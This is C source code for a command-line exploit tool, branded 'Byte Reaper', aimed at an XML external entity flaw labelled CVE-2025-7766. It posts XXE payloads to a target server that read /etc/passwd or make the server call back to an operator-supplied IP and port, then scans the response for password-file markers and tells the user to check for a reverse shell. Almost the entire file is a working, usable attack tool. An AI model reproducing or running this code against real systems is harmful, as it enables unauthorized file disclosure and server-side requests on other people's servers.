#include<stdio.h>
#include<string.h>
#include"argparse.h"
#include<curl/curl.h>
#include<stdlib.h>
#include<unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#define FULL_URL 3000      // capacity of `full` in bytes, including the terminating NUL (see main())
#define SIZE_PAYLOAD 4000  // capacity of the on-stack XML request body built in xmlPost()
// Operator-supplied settings: filled from the command line in main(), read by xmlPost().
const char *yourIp = NULL;       // -i: callback host interpolated into the SYSTEM entity URL in request mode
const char *url = NULL;          // -u: target URL exactly as given on the command line
int yourPort = 0;                // -p: callback port; main() rejects values outside 1..65535
int selecetCookie = 0;           // set by main() when -c is given; enables CURLOPT_COOKIEFILE/COOKIEJAR (typo is part of the identifier)
int verbose = 0;                 // -v: extra diagnostics on stdout plus CURLOPT_VERBOSE
int loop = 0;                    // -l: number of times main() repeats xmlPost()
int selectPayload = 0;           // set by main() when -b is given
const char *yourPayload = NULL;  // -b: custom payload text
char full[FULL_URL];             // NUL-terminated, bounded copy of `url` made by main()
int requestPayload = 0;          // -r: use the outbound-request payload instead of the file-read one
const char *cookies = NULL;      // -c: path of the cookie file handed to libcurl
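/*
 * Terminate the process immediately with exit status 0.
 *
 * Implemented as a raw Linux x86-64 `exit` syscall (rax = 0x3C, rdi = 0),
 * so neither atexit() handlers nor stdio buffers are flushed by the
 * runtime. stdout is therefore flushed explicitly first; without that, the
 * printf() diagnostic issued just before every call to this function is
 * lost whenever stdout is block-buffered (redirected to a file or a pipe).
 *
 * Every error path in this program ends here, so the parent process always
 * observes a success status (0), even on failure.
 */
void exitSyscall(void) {
    fflush(stdout);
    __asm__ volatile (
        "xor %%rdi, %%rdi\n\t"   /* exit status = 0 */
        "mov $0x3C, %%rax\n\t"   /* SYS_exit on x86-64 Linux */
        "syscall\n\t"
        :
        :
        :"rax", "rdi"
    );
}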
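/* Growable byte buffer that accumulates the HTTP response body. */
struct Mem {
    char *buffer;   /* heap block owned by the struct; NULL until the first write, NUL-terminated once set */
    size_t len;     /* bytes stored, excluding the terminating NUL */
};

/*
 * libcurl CURLOPT_WRITEFUNCTION callback: append one received chunk to the
 * struct Mem passed through CURLOPT_WRITEDATA.
 *
 * ptr, size, nmemb: the chunk, size * nmemb bytes (libcurl documents size
 *                   as always 1, so the product cannot overflow in practice).
 * userdata:         struct Mem * to append to.
 *
 * Returns the number of bytes consumed. On allocation failure it returns 0
 * instead of exiting from inside the callback: libcurl then aborts the
 * transfer with CURLE_WRITE_ERROR and the caller's error path releases the
 * handle and header list before exiting. m->buffer stays valid in that case.
 */
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) {
    size_t total = size * nmemb;
    struct Mem *m = (struct Mem *)userdata;
    /* +1 keeps room for the terminator so the body can be used as a C string. */
    char *tmp = realloc(m->buffer, m->len + total + 1);
    if (tmp == NULL) {
        printf("\e[1;31m[-] 内存分配失败!\e[0m\n");
        return 0;   /* signals CURLE_WRITE_ERROR to libcurl; old buffer untouched */
    }
    m->buffer = tmp;
    memcpy(m->buffer + m->len, ptr, total);
    m->len += total;
    m->buffer[m->len] = '\0';
    return total;
}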
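/*
 * Scan body for the fixed markers used to recognise /etc/passwd content and
 * print each one that is present. Returns 1 if at least one marker matched,
 * 0 otherwise. body must be non-NULL (pass "" for an empty response).
 */
static int scanPasswdKeywords(const char *body) {
    static const char *const keywords[] = {
        "root:x:0:0",
        ":/bin/bash",
        ":/home/",
        "daemon:x:",
        "nobody:x:",
        ":x:1000:",
        "/usr/sbin/nologin",
        "sys:x:",
        "bin:x:",
        "mail:x:"
    };
    int found = 0;
    for (size_t f = 0; f < sizeof(keywords) / sizeof(keywords[0]); f++) {
        if (strstr(body, keywords[f]) != NULL) {
            printf("\e[1;33m[+] 在响应中找到关键词: %s\e[0m\n", keywords[f]);
            found = 1;   /* never reset: one match suffices, the rest are still listed */
        }
    }
    return found;
}

/*
 * Send one XML POST to fullUrl and report on the response.
 *
 * The request body is one of two fixed probes chosen by the global flags:
 * with requestPayload set, an external entity pointing at
 * http://yourIp:yourPort/xxe.test (the operator's own listener); otherwise
 * an entity reading file:///etc/passwd. When selectPayload is set the
 * custom text is formatted into the buffer first; the selection below then
 * overwrites it (control flow unchanged from the original).
 *
 * fullUrl:  target URL, already validated by main().
 * yourIp:   callback host interpolated into the request-mode entity.
 * yourPort: callback port, also echoed in the success report.
 *
 * Exits via exitSyscall() on payload-formatting errors, on
 * curl_easy_init() failure and on transfer failure; otherwise releases the
 * header list, the curl handle and the response buffer before returning.
 *
 * Review fixes: the custom payload is no longer used as a printf format
 * string; the curl handle is cleaned up exactly once (the success path
 * previously cleaned it up twice); the response body is never handed to
 * printf()/strstr() as a NULL pointer; the keyword verdict no longer depends
 * on the last keyword alone; int/size_t comparisons are made explicit.
 */
void xmlPost(const char *fullUrl, const char *yourIp, int yourPort) {
    char payload[SIZE_PAYLOAD];
    struct Mem response = { NULL, 0 };

    if (selectPayload) {
        /* Operator-controlled text: copy it through "%s" so that '%' sequences
         * in it are never interpreted as format directives. */
        int s = snprintf(payload, sizeof(payload), "%s", yourPayload);
        if (s < 0 || (size_t)s >= sizeof(payload)) {
            printf("\e[1;31m[-] 检查payload长度!\e[0m\n");
            exitSyscall();
        }
    }
    if (requestPayload) {
        printf("\e[1;37m[+] 选择的Payload: 发送请求Payload\e[0m\n");
        printf("\e[1;34m[+] 请检查服务器状态\e[0m\n");
        const char *payloadR =
            "<?xml version=\"1.0\"?>\n"
            "<!DOCTYPE doc [\n"
            " <!ENTITY xxe SYSTEM \"http://%s:%d/xxe.test\">\n"
            "]>\n"
            "<config>\n"
            " <doc>&xxe;</doc>\n"
            "</config>\n";
        int r = snprintf(payload, sizeof(payload), payloadR, yourIp, yourPort);
        if (r < 0 || (size_t)r >= sizeof(payload)) {
            printf("\e[1;31m[-] 构建payloadR错误\n");
            exitSyscall();
        }
    } else {
        printf("\e[1;37m[+] 选择的Payload: 读取文件 /etc/passwd\e[0m\n");
        const char *autoPayload =
            "<?xml version=\"1.0\"?>\n"
            "<!DOCTYPE doc [\n"
            " <!ENTITY xxe SYSTEM \"file:///etc/passwd\">\n"
            "]>\n"
            "<config>\n"
            " <doc>&xxe;</doc>\n"
            "</config>\n";
        snprintf(payload, sizeof(payload), "%s", autoPayload);
    }

    CURL *curl = curl_easy_init();
    if (curl == NULL) {
        printf("\e[1;31m[-] 创建CURL对象错误!\e[0m\n");
        exitSyscall();
        return;   /* not reached; keeps a NULL handle out of the code below */
    }
    if (verbose) {
        printf("\e[1;35m==========================================\e[0m\n");
        printf("[+] 清理响应...\n");
        /* response.buffer is still NULL at this point; never pass NULL to %s */
        printf("[+] 响应缓冲区: %s\n", response.buffer ? response.buffer : "(null)");
        printf("[+] 响应长度: %zu\n", response.len);
        printf("\e[1;35m==========================================\e[0m\n");
    }

    curl_easy_setopt(curl, CURLOPT_URL, fullUrl);
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);
    curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, strlen(payload));
    if (selecetCookie) {
        curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies);
        curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies);
    }
    curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
    sleep(1);   /* one-second pause before every request, kept from the original */
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb);
    if (verbose) {
        printf("\e[1;35m------------------------------------------[详细模式]------------------------------------------\e[0m\n");
        curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
    }
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response);
    curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L);
    curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L);
    /* Certificate and hostname verification are disabled: the peer is not
     * authenticated and the connection can be intercepted in transit. */
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);

    /* Header list, released after the transfer. */
    struct curl_slist *headers = NULL;
    headers = curl_slist_append(headers, "Accept-Language: en-US,en");
    headers = curl_slist_append(headers, "Connection: keep-alive");
    headers = curl_slist_append(headers, "Referer: http://example.com");
    headers = curl_slist_append(headers, "Content-Type: application/xml");

    double totalTime = 0.0;   /* initialised in case getinfo fails */
    CURLcode res = curl_easy_perform(curl);
    if (res != CURLE_OK) {
        printf("\e[1;31m[-] 请求发送失败!\e[0m\n");
        printf("\e[1;31m[-] 错误: %s\e[0m\n", curl_easy_strerror(res));
        if (verbose) {
            printf("\e[1;31m[-] 执行系统调用退出...\e[0m\n");
        }
        curl_slist_free_all(headers);
        curl_easy_cleanup(curl);
        free(response.buffer);
        exitSyscall();
        return;   /* not reached */
    }

    curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &totalTime);
    printf("\e[1;32m[+] 响应延迟: %f\n", totalTime);
    printf("\e[1;36m[+] 请求发送成功\e[0m\n");
    printf("\e[1;34m[+] 完整URL: %s\e[0m\n", fullUrl);
    if (verbose) {
        printf("\e[1;35m---------------------------[Payload数据]---------------------------\e[0m\n");
        printf("[+] POST数据: %s\n", payload);
        printf("\e[1;35m-----------------------------------------------------------------\e[0m\n");
    }

    /* An empty body leaves response.buffer NULL; print and scan "" instead. */
    const char *body = response.buffer ? response.buffer : "";
    long httpCode = 0;
    curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode);
    if (httpCode >= 200 && httpCode < 300) {
        printf("\e[1;34m[+] 服务器可能存在漏洞 (CVE-2025-7766)!\e[0m\n");
        printf("\e[1;34m[+] 请检查反向Shell连接 (端口 -> %d)\e[0m\n", yourPort);
        printf("[+] HTTP状态码 (200-299范围内)!\e[0m\n");
        printf("\e[1;32m[+] HTTP状态码: %ld\e[0m\n", httpCode);
        printf("\e[1;35m====================================[响应内容]====================================\e[0m\n");
        printf("%s\n", body);
        printf("\e[1;32m[+] 响应长度: %zu\e[0m\n", response.len);
        printf("\e[1;35m===================================================================================\e[0m\n\n");
        printf("\e[1;34m[+] 检查响应中的关键词...\e[0m\n");
        if (scanPasswdKeywords(body)) {
            printf("\e[1;36m[+] 服务器存在CVE-2025-7766漏洞\e[0m\n");
        } else {
            printf("\e[1;31m[-] 未在响应中找到关键词!\e[0m\n");
        }
    } else {
        printf("\e[1;31m[-] HTTP状态码: %ld\e[0m\n", httpCode);
        printf("\e[1;31m[-] 请检查URL (%s)!\e[0m\n", fullUrl);
        if (verbose) {
            printf("\e[1;35m====================================[响应内容]====================================\n");
            printf("%s\n", body);
            printf("\e[1;32m[+] 响应长度: %zu\e[0m\n", response.len);
            printf("\e[1;35m===================================================================================\n\n");
        }
    }

    /* Single release point for every resource acquired above. */
    curl_slist_free_all(headers);
    curl_easy_cleanup(curl);
    free(response.buffer);
    response.buffer = NULL;
    response.len = 0;
}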
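/*
 * Entry point: print the banner, parse and validate the command line, then
 * dispatch to xmlPost().
 *
 * Validation failures (missing -u/-i/-p, over-long URL, non-IPv4 address,
 * port outside 1..65535, URL without an http:// or https:// scheme) are
 * reported on stdout and end the process through exitSyscall(), which
 * exits with status 0.
 *
 * Review fixes: the URL is copied with snprintf() and an over-long value is
 * rejected instead of being silently truncated; the address check uses
 * inet_pton(), which rejects the shorthand forms inet_addr() accepted and
 * has no INADDR_NONE ambiguity; the no-op re-assignments of flags that
 * argparse already set to 1 are gone.
 */
int main(int argc, const char **argv) {
    printf(
        "\e[1;91m"
        "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖\n"
        "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖ ▌ ▌▙▖▙▖\n"
        "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▌ ▌▙▌▙▌\n"
        "\e[1;97m\t Byte Reaper\e[0m\n"
    );
    printf("\e[1;91m---------------------------------------------------------------------------------------\e[0m\n");

    /* Command-line definition; each option writes straight into a global. */
    struct argparse_option options[] = {
        OPT_HELP(),
        OPT_STRING('u', "url", &url, "目标URL(完整URL)"),
        OPT_STRING('c', "cookies", &cookies, "cookie文件"),
        OPT_BOOLEAN('v', "verbose", &verbose, "详细模式"),
        OPT_STRING('i', "ip", &yourIp, "输入您的IP地址"),
        OPT_INTEGER('p', "port", &yourPort, "输入端口号"),
        OPT_INTEGER('l', "loop", &loop, "请求发送次数"),
        OPT_STRING('b', "payload", &yourPayload, "输入自定义Payload"),
        OPT_BOOLEAN('r', "request", &requestPayload, "向服务器发送请求的Payload"),
        OPT_END(),
    };
    struct argparse argparse;
    argparse_init(&argparse, options, NULL, 0);
    argparse_parse(&argparse, argc, argv);

    if (!url || !yourIp || yourPort == 0) {
        printf("\e[1;31m[-] 请输入目标URL、IP地址和端口号!\e[0m\n");
        printf("\e[1;31m[-] 示例: ./exploit -u https://ip:port/path -i IP -p PORT\e[0m\n");
        printf("\e[1;31m[-] 退出...\e[0m\n");
        exitSyscall();
    }

    /* Bounded copy of the URL into `full`; reject rather than truncate. */
    int n = snprintf(full, sizeof(full), "%s", url);
    if (n < 0 || (size_t)n >= sizeof(full)) {
        printf("\e[1;31m[-] URL过长!\e[0m\n");
        exitSyscall();
    }

    /* Require a dotted-quad IPv4 address for the callback host. */
    struct in_addr addr;
    if (inet_pton(AF_INET, yourIp, &addr) != 1) {
        printf("\e[1;31m[-] 无效的IP地址!\e[0m\n");
        exitSyscall();
    }

    if (yourPort < 1 || yourPort > 65535) {
        printf("\e[1;31m[-] 无效的端口号,退出...\e[0m\n");
        exitSyscall();
    }

    if (strncmp(full, "http://", 7) != 0 && strncmp(full, "https://", 8) != 0) {
        printf("\e[1;31m[-] 无效的URL!必须以http://或https://开头\e[0m\n");
        exitSyscall();
    }

    /* -c supplies a cookie file; xmlPost() reads this flag. */
    if (cookies) {
        selecetCookie = 1;
    }

    /* -l: repeat the request `loop` times; a zero or negative count sends none here. */
    if (loop) {
        printf("\e[1;36m[+] 循环参数运行中...\e[0m\n");
        printf("\e[1;36m[+] 循环次数: %d\e[0m\n", loop);
        printf("------------------------------------------------------\n");
        for (int o = 0; o < loop; o++) {
            printf("[%d]: \n", o);
            xmlPost(full, yourIp, yourPort);
            printf("------------------------------------------------------\n");
        }
    }

    /* Dispatch kept as in the original: with -b the flag is recorded and no
     * further request is sent from here; without -b one request goes out in
     * addition to any loop iterations above. */
    if (yourPayload) {
        selectPayload = 1;
    } else {
        xmlPost(full, yourIp, yourPort);
    }
    return 0;
}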